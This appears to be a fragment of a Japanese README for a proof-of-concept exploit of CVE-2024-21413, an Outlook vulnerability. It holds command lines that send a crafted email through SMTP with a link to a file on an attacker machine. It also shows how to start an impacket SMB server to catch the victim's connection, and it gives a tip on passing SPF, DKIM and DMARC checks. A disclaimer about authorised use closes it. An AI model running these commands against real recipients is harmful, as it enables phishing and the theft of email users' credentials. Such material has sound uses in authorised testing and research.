
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t : 攻撃マシン (xx.xx.xx.xx) から共有されたテストファイルです (この場合は word ファイル)。
SPF、DKIM、DMARC に準拠させるには、正規の $IP とドメインを使用してください。
まだインストールしていない場合は、
pip install pexpectを使用して pexpect ライブラリをインストールしてください。
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp 。
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
- Kudooooos & CVE-2024-21413 の詳細 。
- 回避策/修正:
[!CAUTION] ⚠️ 免責事項: 重要: このスクリプトは、教育、倫理的なテスト、および合法的な使用のみを目的として提供されています。明示的な許可なしに、いかなるシステムやネットワークでも使用しないでください。コンピュータシステムやネットワークへの不正アクセスは違法であり、許可なく不正な活動を行ったユーザーは法的措置の対象となります。作者は、このスクリプトの誤用によって引き起こされたいかなる損害についても責任を負いません。